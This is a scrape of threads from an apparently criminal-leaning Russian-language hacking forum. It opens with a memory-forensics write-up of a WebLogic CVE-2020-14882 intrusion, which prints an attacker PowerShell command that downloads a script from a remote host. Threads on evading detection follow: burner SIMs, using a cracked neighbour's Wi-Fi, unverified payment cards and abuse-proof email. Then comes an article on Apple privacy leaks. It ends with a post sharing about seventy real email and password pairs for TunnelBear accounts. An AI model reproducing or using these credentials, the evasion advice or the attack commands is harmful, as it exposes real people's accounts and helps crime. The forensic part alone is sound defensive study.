python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 printkey -o 0xffff808fe7e41000 -K "ControlSet001\Services\Tcpip\Parameters\Interfaces\{792f6020-c342-4520-922a-542fbfccc4b6}"

Сетевой адрес компьютера — 192.168.144.131, IP-адрес выдается DHCP-сервером 192.168.144.254.

Теперь получим информацию о версии операционной системы.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 printkey -K "Microsoft\Windows NT\CurrentVersion"

Версия операционной системы — Windows Server 2016 Standard Evaluation.

Получим время, которое было зафиксировано в момент снятия образа оперативной памяти. Для этого воспользуемся плагином windows.info утилиты Volatility 3.

Code:Copy to clipboard

python3 vol.py -f c63-bsidesjeddah-mem/memory.mem windows.info

Системное время — 2021-08-06 16:13:23.

Далее попытаемся восстановить действия пользователя в системе. Проанализируем историю браузера, в данном случае Internet Explorer. Для этого воспользуемся плагином iehistory.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 iehistory > c63-bsidesjeddah-mem/iehistory.txt

Нам удалось выяснить, что 6 августа 2021 года пользователь Administrator посетил страницу news.google.com.

Теперь приступим к поиску вредоносной активности. Для этого нам необходимо проанализировать процессы, сетевой трафик, команды запуска исполняемых файлов, а также исследовать строки процессов.
Для начала получим список запущенных в системе процессов, а также сетевую активность и сохраним результат работы плагинов в файлы pstree.txt и netscan.txt соответственно.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 pstree > c63-bsidesjeddah-mem/pstree.txt

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 netscan > c63-bsidesjeddah-mem/netscan.txt

В списке процессов можно заменить программу RamCapture.exe компании Belkasoft.

В файле netscan.txt отмечено двенадцать стабильных сетевых соединений, об этом нам говорит колонка State, демонстрирующая работу плагина netscan с установленным значением ESTABLISHED.

Проанализируем дерево процессов и найдем среди них аномальные. Необходимо обращать внимание на процессы, которые запускают дочерний процесс с именами cmd.exe, powershell.exe, conhost.exe, а также на исполняемые файлы с нестандартным расположением.

Процессом java.exe (идентификатор 4752) запущено множество дочерних powershell.exe, что может свидетельствовать о подозрительной активности. Также у процесса powershell.exe (идентификатор 4344) запущены дочерние процессы conhost.exe (идентификатор 4636) и svchost.exe (идентификатор 1488).

Получим дамп данных процессов и проанализируем их строки.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 memdump -p 4752 -D c63-bsidesjeddah-mem/

Мы сохранили дамп в файл 4752.dmp.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 memdump -p 4344 -D c63-bsidesjeddah-mem/

Результат работы сохранен в файле 4344.dmp.
Теперь с помощью утилиты strings вытащим все строки и сохраним их в файл.

Code:Copy to clipboard

strings 4752.dmp > str_4752.txt

Code:Copy to clipboard

strings 4344.dmp > str_4344.txt

Прежде чем анализировать строки, получим аргументы командной строки для запуска процессов. Для этого воспользуемся плагином cmdline и найдем в нем процесс java.exe (идентификатор 4752).

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 cmdline > c63-bsidesjeddah-mem/cmdline.txt

Процесс cmd.exe (идентификатор 4556), который является родителем процесса java.exe (4752), запускает сервер WebLogic. Значит, процесс java.exe — результат работы веб‑сервера.
Выясним версию WebLogic, для этого получим список файлов в системе.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 filescan > c63-bsidesjeddah-mem/filescan.txt

Анализируя список файлов, мы обнаруживаем файл лога веб‑сервера WebLogic — AdminServer.log.

Восстановим его и проанализируем: виртуальный адрес файла в образе памяти — 0xb68cb2c205c0. Восстановить этот файл с использованием утилиты Volatility 2 мне не удалось, попробуем это сделать с помощью Volatility 3.

Code:Copy to clipboard

python3 vol.py -f c63-bsidesjeddah-mem/memory.mem windows.dumpfiles --virtaddr 0xb68cb2c205c0

В восстановленном файле указана версия WebLogic Server — 14.1.1.0.0.

Слушатель WebLogic Server работает на порте 7001, но запросы к веб‑серверу идут на 80-й порт.

Найдем перенаправление порта в ключе реестра PortProxy, для этого воспользуемся плагином printkey.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 printkey -K "ControlSet001\Services\PortProxy\v4tov4\tcp"

В системе установлено перенаправление порта 80:7001.

Мы выяснили версию веб‑сервера: она уязвима и позволяет выполнять удаленный код в системе. В файле лога AdminServer.log видны результаты выполнения функции com.tangosol.coherence.mvel2.sh.ShellSession, а также запрос к /console/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=UnexpectedExceptionPage.

Теперь найдем процесс, через который злоумышленник получил первоначальный доступ. У нас есть дамп процесса 4752, мы нашли его строки, теперь отыщем в нем GET-запрос с параметром handle=com.tangosol.coherence.mvel2.sh.ShellSession.

Итак, искомый процесс — это java.exe, идентификатор 4752. Именно он был ответственен за первоначальный доступ к системе. Злоумышленник проэксплуатировал уязвимость [CVE-2020-14882](https://pentest- tools.com/blog/detect-exploit-oracle-weblogic-rce-2020) в сервере WebLogic версии 14.1.1.0.0, позволяющую выполнять удаленный код в системе. Как видно из иллюстрации выше, хакер запустил обратную оболочку с управляющим сервером 192.168.144.129:1339.

Анализируя работу плагина netscan, можно увидеть запущенный процесс powershell.exe (идентификатор 4344), который взаимодействует с 192.168.144.129:1339.

Результат работы плагина netscan
Воспользуемся плагином pslist и найдем следующий процесс в списке ActiveProcessLinks, его идентификатор 4772.

Как видно из иллюстрации, процесс java.exe имеет 44 потока. Продолжим анализировать строки процесса java.exe.
В результате анализа строк можно увидеть загрузку файлов presist.ps1 и pastebin.ps1.

Попробуем восстановить команды для загрузки этих файлов. Так как команды выполняются с использованием PowerShell, получим дамп всех процессов powershell.exe, запущенных от имени java.exe (идентификатор 4752). Для этого воспользуемся плагином memdump. Восстановим команду для загрузки сценариев PowerShell.

Code:Copy to clipboard

strings -e l ./out_powershell/* | grep -i 'presist.ps1' | sort -u

Команда для загрузки сценария presist.ps1 выглядит следующим образом:

Code:Copy to clipboard

Invoke-WebRequest -Uri "http://192.168.144.129:1338/presist.ps1" -OutFile "./presist.ps1"

Загрузка файла pastebin.ps1 выполнялась при помощи следующей команды:

Code:Copy to clipboard

strings -e l ./out_powershell/* | grep -i 'presist.ps1' | sort -u

Найдем код pastebin.ps1 и проанализируем его. Для этого будем искать этот код в строках дампа наших процессов. При исследовании результатов вывода плагина cmdline мы заметили, что процесс notepad.exe (идентификатор 4596) открыл файл exfiltrator.txt.

Получим дамп процесса 4596 и проанализируем строки.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 memdump -p 4596 -D c63-bsidesjeddah-mem/

Этот скрипт предназначен для выгрузки текстовых файлов на ресурс pastebin.com, но ему в качестве параметра необходимо указать ссылку. Поиск ссылки на выгрузку файлов в строках дампа процесса notepad.exe не дал результатов.

В строках вредоносного процесса 4344 удалось обнаружить ссылку https://pastebin.com/A0Ljk8tu для выгрузки файлов. Значит, скрипт pastebin.ps1 запускался от имени данного процесса.

Найдем методы закрепления злоумышленника в системе. Для этого воспользуемся плагином autoruns или проанализируем строки процесса 4344.

Злоумышленник создал службу ServiceUpdate, которая запускает обратную оболочку с управляющим сервером 192.168.144.129, порт 1339. Согласно матрице MITRE ATT&CK, идентификатор этой техники — T1053.005.

Продолжаем анализировать вредоносные процессы. Получим дамп процесса svchost.exe (идентификатор 1488), найдем его виртуальный адрес расположения файла в системе и с помощью плагина windows.dumpfiles утилиты Volatility 3 выгрузим его.

Виртуальный адрес файла в образе памяти — 0xb68cb2b8a080. Восстановим его.

Code:Copy to clipboard

python3 vol.py -f c63-bsidesjeddah-mem/memory.mem windows.dumpfiles --virtaddr 0xb68cb2b8a080

После восстановления получим MD5-сумму файла 2c5ae1d11a02d19ab65f5fc06a33d603 и проверим ее на VirusTotal. Согласно отчету антивирусных компаний, перед нами полезная нагрузка фреймворка Cobalt Strike. Получим дамп процесса и попробуем вытащить конфигурацию C2.

Code:Copy to clipboard

python2.7 vol.py -f c63-bsidesjeddah-mem/memory.mem --profile=Win2016x64_14393 memdump -p 1488 -D c63-bsidesjeddah-mem/

Загрузим утилиту [parse cobalt strike config](https://github.com/Sentinel- One/CobaltStrikeParser) и найдем в памяти процесса конфигурацию маяка.

Code:Copy to clipboard

python3 parse_beacon_config.py ../pid.1488.dmp --version 4

Мы узнали тип маяка (HTTP), адрес управляющего сервера (192.168.144.129), порт (1339), а также публичный ключ. Получим MD5-сумму ключа.

Code:Copy to clipboard

echo MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCknNpTPXGlTqpVXN9GP8xG/Otf4yDG2QQCJFReupN16br/aMd+0RTSqOmKCjMHdR6fm133/abvH1KVRge7oNowjO0RvdKVZTnNZqPnOkruOd7pDvjcJ13huwnsGA6rqW3jwNNb1hDix6K4H+DGYx/RQTxDc/nhj59Ae/5Tz9iC/QIDAQAB" | base64 -d | md5sum

MD5-сумма публичного ключа — fc627cf00878e4d4f7997cb26a80e6fc.

ВЫВОДЫ

Мы провели расследование инцидента и восстановили картину взлома ресурса: 6 августа 2021 года злоумышленник проэксплуатировал уязвимость [CVE-2020-14882](https://pentest-tools.com/blog/detect-exploit-oracle- weblogic-rce-2020) в Oracle WebLogic Server, которая позволяет не прошедшим авторизацию пользователям выполнять удаленный код в системе.

Таким образом атакующий загрузил обратную оболочку с управляющим сервером 192.168.144.129, порт 1339. Далее он закрепился в системе, создав службу ServiceUpdate. Для этого злоумышленник загрузил PowerShell-сценарий presist.ps1. Данный сценарий создает службу ServiceUpdate, которая запускает обратную оболочку.

Для эксфильтрации данных злоумышленник загрузил сценарий pastebin.ps1, который отправляет собранные файлы на удаленный сервер. Затем атакующий загрузил маяк Cobalt Strike для постэксплуатации в системе.

В ходе нашего расследования мы научились извлекать конфигурацию маяка из памяти, а также искать важные артефакты в памяти процессов.

автор @rayhunt454
источник xakep.ru

удаленный рабочий стол

ID: 676533bbb4103b69df371b56
Thread ID: 61935
Created: 2022-01-24T19:51:38+0000
Last Post: 2022-01-24T20:03:10+0000
Author: serverspace
Replies: 1 Views: 268

DELETED

Анонимные крипто-транзакции

ID: 676533bbb4103b69df371a32
Thread ID: 94276
Created: 2023-07-29T09:15:42+0000
Last Post: 2023-07-29T09:15:42+0000
Author: b1ack
Replies: 0 Views: 268

Use monero , use whonix , use electrum for bitcoin and use tor as your default proxy , Basically search for OPSEC

Анонимность и безопасность на уровне локальной сети

ID: 676533bbb4103b69df371a49
Thread ID: 91544
Created: 2023-06-28T02:12:19+0000
Last Post: 2023-06-28T02:12:19+0000
Author: verb0
Replies: 0 Views: 268

Итак, варианты:

Левая симка на левом телефоне, оттуда tethering или hotspot. Спутниковый интернет сюда же, с дополнительными сложностями анонимного оформления.
Легальность: продавать левые симки в РФ (и многих других странах) нелегально, покупать в РФ - легально и распространено.
Плюсы: можно реализовать в любой локации со 100% успехом, скорость соединения в черте города скорее всего будет приемлемой или выше, симку просто уничтожить

а телефон можно смыть.
Минусы: отлаженное определение геопозиции с высокой точностью (Но работает ли это по высоте? Что если телефон в многоэтажке? GSM-модуль можно пинговать и сравнивать скорость пинга на разных расстояниях от него? Думаю, что да), гипотетические RCE в GSM модуле с выходом на микрофон.

Вайфай в общественном месте.
Легальность: легален, если его не взламывать.
Плюсы: комфорт, стабильность.
Минусы: CCTV-контроль позволяет скоррелировать вас-ирл и вас-чёрного по таймингу присутствия в заведении и онлайна в мессенджере\открытой сессии на подконтрольном сервере, 0 секунд на реакцию в случае проблем.

Взломанный вайфай соседа или близкого общественного места.
Легальность: нелегально, но практики правоприменения в РФ не нашёл.
Плюсы: связь с вами устанавливается на шаг дальше и сложнее, готовый подозреваемый работа с которым займёт время, возможно удастся поймать момент обыска и это станет сигналом заранее о наличии дела.
Минусы: ваш мак и вас-чёрного можно скоррелировать по наличию трафика от этого мака в определённую wifi-сеть и онлайна в мессенджере\открытой сессии на подконтрольном сервере, после этого мак можно пинговать чтобы примерно найти локацию - но чтобы этим заниматься, нужно либо изначально ожидать подвоха, либо убедиться что владелец вайфая реально не подходит в дело. Плюс, у вас может просто не оказаться ломаемых сетей со стабильным приёмом, или же чужих сетей вообще (частный дом с участком вокруг). Плюс, соседи могут и сами спалить левый клиент\потерю скорости и дедуктивно выйти на вас.

Положить телефон в подъезде и создать открытую точку доступа.
Легальность: легально, может нарушать соглашение с провайдером хехе
Плюсы: таким интернетом пользуются много людей, что усложняет корреляцию мака и онлайна.
Минусы: вы не найдёте источник электричества, или ваша врезка в щитке будет спалена, или ваша врезка создаст проблем для сети, или телефон просто спиздят через какое-то время. По подъездному CCTV есть возможность приблизительно определить истинного владельца хотспота, когда телефон выключат а вы пойдёте посмотреть, что же там не так.

Дискасс.

Есть варианты сделать анонимную вит. карту?

ID: 676533bbb4103b69df371ba5
Thread ID: 56604
Created: 2021-09-12T17:57:34+0000
Last Post: 2021-09-16T01:19:17+0000
Author: Lerod
Replies: 1 Views: 267

Подскажите по теме вопроса.

Нужно для небольших оплат в РФ.
Остались ли еще варианты без прохождения верификаций итд?

openvpn на RDP

ID: 676533bbb4103b69df371aa3
Thread ID: 74708
Created: 2022-10-25T17:43:18+0000
Last Post: 2022-10-28T23:09:33+0000
Author: ABPOPA
Replies: 3 Views: 262

Дорогие форумчане, при установке openvpn на windows server отпадает доступ RDP

как поставить конфиг openvpn на RDP windows так что бы можно было заходить по RDP.

Абузоустойчивый e-mail

ID: 676533bbb4103b69df371af3
Thread ID: 70076
Created: 2022-07-13T18:48:16+0000
Last Post: 2022-07-18T09:40:11+0000
Author: VasyaPytin
Replies: 2 Views: 262

Посоветуйте пожалуйста e-mail сервис, который выдерживает жалобы. Есть тема на форуме, но она ориентирована на анонимность, а нужен e-mail который не забанит ящик за жалобы на него. Может кто знает....
P.S. Protonmail забанил ящик

помогите поднять свой OVPN

ID: 676533bbb4103b69df371aae
Thread ID: 73975
Created: 2022-10-05T11:10:56+0000
Last Post: 2022-10-05T15:00:13+0000
Author: asddddd
Replies: 8 Views: 261

Как поднять openvpn, через ssh зайти не могу, есть только vnc из панели. Сервер на убунту. Какие выбирать порт и днс сервер. Как отключить логирование, я полный нуб в этом и пользуюсь линуксом впервые. Зашел я от рута, прописываю /etc/openvpn/server/server.conf и терминал выдает ошибку -bash: /etc/openvpn/server/server.conf: Permission denied

Ускорение VPS и многослойных VPS

ID: 676533bbb4103b69df371b75
Thread ID: 59980
Created: 2021-12-12T09:22:53+0000
Last Post: 2021-12-12T09:57:54+0000
Author: 0xnet
Replies: 1 Views: 261

Как ускорить многоуровневое VPS VPN для снижения задержки

Концепции атаки на конфиденциальность через устройства Apple

ID: 676533bbb4103b69df371a34
Thread ID: 94079
Created: 2023-07-26T22:28:23+0000
Last Post: 2023-07-26T22:28:23+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 260

[Автор оригинала: Konstantin Darutkin](https://fingerprint.com/blog/apple-id- region-leak/)

В этой статье мы исследуем потенциальные уязвимости конфиденциальности в устройствах Apple. В первой части мы расскажем о методике определения региона Apple ID без разрешений при помощи Smart App Banners, а во второй объясним, как можно реализовать утечку реального имени пользователя macOS через браузер без разрешений.

Что такое регион Apple ID?

Регион Apple ID, также называемый регионом App Store — это параметр, связанный с аккаунтом Apple ID пользователя. Он определяет, к контенту и сервисам какой страны имеет доступ пользователь в App Store, iTunes Store и других сервисах Apple. Обычно регион определяется по платёжному адресу, связанному с Apple ID пользователя, который часто привязан к стране кредитной или дебитовой карты или зарегистрированному адресу.

Регион Apple ID влияет на различные аспекты взаимодействия пользователя с системой, в частности:

Доступность приложений : некоторые приложения или функции приложений могут быть доступны только в отдельных регионах из-за ограничений лицензирования, регионального законодательства или целевого рынка разработчика.

Контент и ценообразование : выбранный регион также может влиять на ценообразование и валюту приложений, фильмов, книг и другого цифрового контента в App Store и iTunes Store. Ещё он может влиять на региональный контент, например, на местные новости, телешоу или фильмы.

Сервисы : некоторые сервисы Apple, например, Apple Pay или Apple News, могут быть доступны только в отдельных регионах.

Для смены региона Apple ID пользователь может перейти в параметры аккаунта и изменить страну или регион, привязанный к его Apple ID. Однако перед внесением такого изменения ему может понадобиться отменить некоторые подписки или потратить оставшиеся средства в магазине. После изменения региона пользователь получит доступ к контенту и сервисам нового региона.

Что такое Smart app banners?

С выпуском iOS 6 компания Apple представила Smart App Banners, помогающие разработчикам рекламировать их нативные приложения в вебе. Эти баннеры появляются в верхней части веб-страницы при просмотре на устройстве с iOS, отображают информацию о приложении и предоставляют прямую ссылку на App Store для удобства установки. Они предназначены для повышения удобства пользователей и помощи разработчикам в привлечении большего трафика к их приложениям для iOS.

Сужение вариантов регионов Apple ID: методика двоичного поиска

Если приложение недоступно в установленном регионе или стране Apple ID, то Smart App Banner для приложения iOS с ограничением по регионам не будет отображаться в браузере. Нападающие могут точно вычислить страну пользователя, выполнив двоичный поиск по всем 175 доступным в App Store регионам.

Возьмём для примера региональное приложение iOS, допустим, Starbucks France. Эти приложения предоставляют нападающим уникальную возможность использовать Smart App Banners для определения региона Apple ID пользователя.

Для реализации методики двоичного поиска мы составим список Smart App Banners приложения. Для максимальной эффективности каждое приложение должно быть доступно только в равномерно распределённой группе стран. Это позволит нападающему на каждом шаге уменьшать количество имеющихся вариантов примерно вдвое. Если считать, что первоначальный список возможных стран состоит из X (175 стран), то шаги будут такими:

Вставляем Smart App Banner приложения iOS, доступное в Y странах, в HTML-код, и определяем наличие баннера при помощи браузерного API VisualViewport.

Если баннер был показан, уменьшаем диапазон поиска до Y. Если нет, то уменьшаем диапазон поиска до X, не представленных в Y.

Повторяем шаги 1-2 для сужения списка возможных стран до единственной, которая будет обозначать регион Apple ID пользователя.

Демо можно проверить на iPhone и iPad, а [исходный код](https://github.com/fingerprintjs/blog-apple- id-region-detection) выложен на Github.

Вывод

Утечка информации о регионе Apple ID может представлять угрозу для конфиденциальности пользователя и делать вклад в методики фингерпринтинга, позволяющие сторонним лицам отслеживать и идентифицировать пользователей на различных онлайн-платформах. Кроме того, эта информация остаётся неизменной в различных сетях и вне зависимости от использования VPN.

Брутфорс реального имени пользователя macOS из браузера при помощи mDNS

В этой части мы объясним, как можно реализовать утечку реального имени пользователя macOS через браузер без разрешений. [Демо](https://mdns-name- guesser.vercel.app/) proof of concept оптимизировано под производительность, а не точность, к тому же на результаты могут влиять конфигурация устройства или сети.

В методике брутфорса имени используется заранее составленный список из 50 самых популярных имён с учётом гендера для конкретных стран. Наши эксперименты показали, что этого достаточно для правильного определения имени пользователя macOS в среднем в 65% случаев.

Протокол Multicast DNS и Apple Bonjour

В реализации эксплойта используется протокол multicast DNS (mDNS). Протокол mDNS предназначен для регистрации, обнаружения и вещания имён устройств по локальной сети.

Например, когда конкретное устройство, допустим, принтер, хочет, чтобы его обнаружили по локальной сети, он отправляет на зарезервированный внутренний IP-адрес 224.0.0.251 UDP-пакет регистрации, содержащий имя хоста наподобие HP_LaserJet_Printer.local. Домен верхнего уровня .local означает, что имя хоста должно ресолвиться при помощи протокола mDNS.

Такие пакеты маршрутизатор автоматически вещает другим устройствам в локальной сети, чтобы они могли кэшировать имя хоста. Или же устройства могут отправлять пакеты запросов на тот же зарезервированный IP-адрес, пытаясь обнаружить устройство с конкретным именем, которого может и не быть в сети.

Вот примеры имён хостов mDNS:

johns-mac-mini.local

david-ZenBook-UX431DA-UM431DA.local

james-iphone.local

canon-mf644c.local

bedroom-appletv.local

dlinkrouter.local

Протокол multicast DNS широко используется в устройствах Apple в рамках функции Apple Bonjour.

По умолчанию устройства Apple раскрывают имя пользователя в локальных именах хостов, и эту особенность мы используем для методики брутфорса имён. Локальное имя хоста macOS можно просмотреть и изменить в разделе Sharing настроек System Settings.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fr%2Fw1560%2Fwebt%2Fbz%2Fem%2Ffk%2Fbzemfkaopq- srgxpxyacqsnqvgy.png&hash=18d7735214f0ccd31d05a04f3521021e)

Ресолвинг имён хостов mDNS из браузера

К сожалению, протокол multicast DNS основан на UDP-пакетах. Браузерные среды JavaScript не поддерживают произвольные UDP-сокеты, поэтому невозможно напрямую использовать протокол mDNS в браузере.

Однако мы можем ресолвить имена хостов из браузера при помощи таймингов. Сделаем два обычных GET-запроса fetch к существующему (device-1.local) и несуществующему (device-2.local) адресам mDNS:

Браузер попытается выполнить ресолвинг имени хоста, указанного в адресе URL. Если адрес ресолвнется, он отправит TCP-пакет на порт 80, который в нашем случае, скорее всего, будет закрыт. На скриншоте выше показаны два сообщения об ошибке:

ERR_CONNECTION_REFUSED для существующего device-1.local

ERR_NAME_NOT_RESOLVED для несуществующего device-2.local

Обе ошибки будут преобразованы в одну ошибку JavaScript Failed to fetch, поэтому нам нельзя полагаться на тип ошибки, однако мы можем выполнить атаку по времени. Локальные сети быстры, поэтому зарегистрированное в сети валидное имя хоста mDNS будет заресолвлено за разумный промежуток времени, который существенно меньше стандартного таймаута соединения. В представленном выше примере разница заключается в четырёх миллисекундах для валидного адреса против пяти секунд для невалидного.

Такая методика достаточно стабильна, чтобы являться решением уровня proof of concept и работает схожим образом во всех популярных браузерах. На практике для выполнения атак по времени для ресорвинга DNS можно использовать любой сетевой API JavaScript, например, iframe, Image или WebRTC.

Брутфорс имени пользователя macOS

Как показано выше, стандартное локальное имя хоста macOS содержит имя пользователя и имя устройства. Более того, имя хоста зависит от локали системного языка:

Английский: s-macbook-pro.local

Французский: macbook-air-de-.local

Русский: mac-mini-.local

Например, мы можем взять 1000 самых распространённых имён, 10 самых популярных локалей и пять частых имён устройств macOS. В такой ситуации потребуется протестировать 50000 имён хостов, что может занять больше часа. Более эффективная стратегия заключалась бы в ограничении диапазона поиска до одной локали, одного устройства и 50 самых распространённых в этой локали имён. Хотя это снижает точность, зато повышает реалистичность атаки на практике и существенно ускоряет её.

Выбор локали может основываться на часовом поясе браузера, языке или местоположении IP-адресе. Например, в браузере Safari системную локаль можно узнать при помощи свойства navigator.language, которое обычно совпадает с локалью атакуемого имени хоста. Кроме того, существуют другие способы определения страны пользователя, например, описанное выше распознавание региона Apple ID.

Возможные варианты устройства можно сузить по разрешению экрана. Например, разрешение 1728x1117, скорее всего, относится к 16-дюймовому Macbook Pro. Расширенный экран можно распознать при помощи свойства screen.isExtended, что позволит ограничить варианты устройств до трёх-пяти наиболее популярных устройств Apple macOS.

В демо proof of concept есть селекторы страны имени и гендера имени, что приводит к составлению за несколько секунд списка из 50-100 потенциальных имён хостов. У 100 сотрудников нашей компании, поучаствовавших во внутреннем тесте, демо успешно спрогнозировало имя в 65% случаев. Исходный код выложен на GitHub.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fr%2Fw1560%2Fwebt%2Fk2%2F5b%2Fil%2Fk25bil- sshumapzfsq3wqasuszg.png&hash=1740984ba199b6fd881e4db1de60ee63)
Важно отметить, что демо proof of concept — это просто демонстрация атаки и в некоторых случаях она может быть безуспешной. Вот некоторые из факторов, которые могут повлиять на результаты:

Наличие редких или уникальных имён пользователей или нестандартных имён хостов macOS

Особые сетевые конфигурации или сети VPN networks

Включённый в сетевых параметрах macOS файрволл

Если демо у вас не сработало, то попробуйте использовать параметры расширенной конфигурации, чтобы проверить список сканируемых имён и применяемый паттерн имён устройств. Если вы используете VPN, то попробуйте протестировать демо с VPN и без него, потому что результаты могут оказаться разными.

Вывод

Учитывая слабые места и множественные ограничения, эта атака непрактична. Её можно без проблем обнаружить в сетевой вкладке или инструментах разработчика в браузере, если только владелец сайта намеренно не намеревался деанонимировать посетителей.

В этой статье мы просто изучаем границы Интернет-конфиденциальности и используем нетрадиционные методики реализации взлома конфиденциальности. Ещё один пример: скомбинировав этот метод с определением установленных приложений, потенциально можно разработать зловредный веб-сайт, способный показывать реальное имя и должность пользователя на основании списка используемых профессиональных приложений и без необходимости разрешений.

Хотя в этой части статьи рассматриваются устройства Apple с macOS, методику обнаружения через mDNS можно использовать множеством разных способов. Например, её можно применить для выполнения сканирования локальной сети с целью определения таких устройств, как принтеры, смарт-телевизоры, умные колонки и других IoT-устройств.

Эта методика также применима к iPhone и iPad, если активированы функции [синхронизации по Wi-Fi](https://support.apple.com/guide/mac-help/wi-fi- syncing-mchlada1d602/mac) или удалённой отладки Safari.

400 Tunnel Bear Accounts (Checked 11/17/2021)

ID: 676533bbb4103b69df371b7d
Thread ID: 58965
Created: 2021-11-17T22:08:25+0000
Last Post: 2021-11-17T22:08:25+0000
Author: z3r013
Replies: 0 Views: 259

Enjoy

Link for checker and small explain about misconfiguration tunnelbear have. : https://xss.is/threads/58964/#post-390300 and

Spoiler: List

bossen@live.no:bossenNr1 500.0 MB Little TunnelBear
thebesttennis@gmail.com:Confetti1 0.0 MB Little TunnelBear
catman0323@yahoo.com:Scooby0323 500.0 MB Little TunnelBear
luisplascencia12@yahoo.com:Pizza914 500.0 MB Little TunnelBear
damszczur@gmail.com:momanddad23 0.0 MB Little TunnelBear
xleonm2012@gmail.com:ezr2ur2w 500.0 MB Little TunnelBear
henhen.burns@gmail.com:starclan19 0.0 MB Little TunnelBear
alexanderspanner@googlemail.com:2402dozzer 750.0 MB Little TunnelBear
crustyplays12@gmail.com:Alper2002 500.0 MB Little TunnelBear
colinjcorb@gmail.com:bearsden2031 1500.0 MB Little TunnelBear
4tehlolxz@gmail.com:1donttrustme 500.0 MB Little TunnelBear
dimatumofiiv88@gmail.com:dima64721 500.0 MB Little TunnelBear
amin_zkh@yahoo.com:Ninja1380 102400.0 MB Little TunnelBear
heriver602@gmail.com:Jetfarmer1 500.0 MB Little TunnelBear
dani3g@gmail.com:sdcc1998 500.0 MB Little TunnelBear
cody_guy41001@yahoo.com:Soccer14! 500.0 MB Little TunnelBear
chrisdoyle1998@gmail.com:042698cd 10240.0 MB Little TunnelBear
wpmasterson@gmail.com:nanu1120 500.0 MB Little TunnelBear
wmh01@hotmail.com:kissme77 500.0 MB Little TunnelBear
ciaransp@gmail.com:pizzapieman52 500.0 MB Little TunnelBear
ben.mandanas@gmail.comender19 3500.0 MB Little TunnelBear
docstarvingwild@gmail.com:medo2299 10240.0 MB Little TunnelBear
vazquez9212@gmail.com:sukkafree1 500.0 MB Little TunnelBear
thebadpotatoe55@gmail.com:killerk91 500.0 MB Little TunnelBear
darklightfighter1715@gmail.com:Quentin17 5500.0 MB Little TunnelBear
d.svistelnik42@gmail.com:magnus2003 0.0 MB Little TunnelBear
dnb.voodoodna@gmail.com:aa301010 500.0 MB Little TunnelBear
george77hillier@hotmail.com:hillier1066 1500.0 MB Little TunnelBear
ayman.316@outlook.com:Ahmedco12 500.0 MB Little TunnelBear
jmenez.paco@yahoo.com:fmjg8260 500.0 MB Little TunnelBear
dair.k@bk.ruair2002 0.0 MB Little TunnelBear
alienhunterzed@gmail.com:Galayev2004 500.0 MB Little TunnelBear
wyattshadowfax28@gmail.com:Beholder759 500.0 MB Little TunnelBear
danila.sinitsa@yandex.ru:Sinitsa2005 0.0 MB Little TunnelBear
ncm1904@gmail.com:chargers1904 0.0 MB Little TunnelBear
arcline1@live.com:Cf12341235 4500.0 MB Little TunnelBear
akms202@gmail.com:battleon202 500.0 MB Little TunnelBear
diegomorales02032001@gmail.comiego123 500.0 MB Little TunnelBear
javierodst@hotmail.com:5t6y7u8i9o 500.0 MB Little TunnelBear
wylie1st@hotmail.com:eevg8dfwdyfyh 500.0 MB Little TunnelBear
gabrielpetri06@hotmail.com:biel2010 10240.0 MB Little TunnelBear
mehdilahboub@yahoo.com:boorne2009 500.0 MB Little TunnelBear
grimjow.jaguer@yahoo.fr:nathan68 500.0 MB Little TunnelBear
coopersichter03@hotmail.com:Sailing11 0.0 MB Little TunnelBear
jonatasalulas10@gmail.com:1010jonatas 500.0 MB Little TunnelBear
d.slowy@yahoo.deermeister22 500.0 MB Little TunnelBear
skopper@bucs.fsw.edu:FMEels66 1500.0 MB Little TunnelBear
nicholas.joaquim@hotmail.com:poochbaby24 7500.0 MB Little TunnelBear
chanbenny1999@gmail.com:beastm0d3 500.0 MB Little TunnelBear
djemila1@gmail.com:Br1llIant 1500.0 MB Little TunnelBear
pietlp.tv@gmail.com:reopro2003 10240.0 MB Little TunnelBear
jeffthornton94@gmail.com:wrestler1 10240.0 MB Little TunnelBear
bennygouldie@gmail.com:Bfmc3006 500.0 MB Little TunnelBear
shiroolab@gmail.com:rjhdby88 14240.0 MB Little TunnelBear
mc_hoekstra1@ymail.com:jackiebear4 500.0 MB Little TunnelBear
yannathome@btinternet.com:design02 5500.0 MB Little TunnelBear
chrisroberts94@gmail.com:snowman88 13240.0 MB Little TunnelBear
deutch-2005@hotmail.com:england21 1500.0 MB Little TunnelBear
geraldchuakj@gmail.com0521867a 500.0 MB Little TunnelBear
dumbcyberman@gmail.com:Hallett123 500.0 MB Little TunnelBear
chaoscaos27@gmail.com:aelita44 2500.0 MB Little TunnelBear
robert.huff08@yahoo.com:kempner08 13240.0 MB Little TunnelBear
dantheminor4@gmail.com:qazplm67 500.0 MB Little TunnelBear
acidicmadman@gmail.com:zombies1999 500.0 MB Little TunnelBear
kscarberry@hotmail.com:Hateway1 500.0 MB Little TunnelBear
dirklingsbuisness@gmail.com:Orange12 500.0 MB Little TunnelBear
st.jeppe@gmail.com:s1katm4k 500.0 MB Little TunnelBear
benlansford@gmail.com:61327smartcat 11240.0 MB Little TunnelBear
jntieo@hotmail.com:ilovelife92 500.0 MB Little TunnelBear
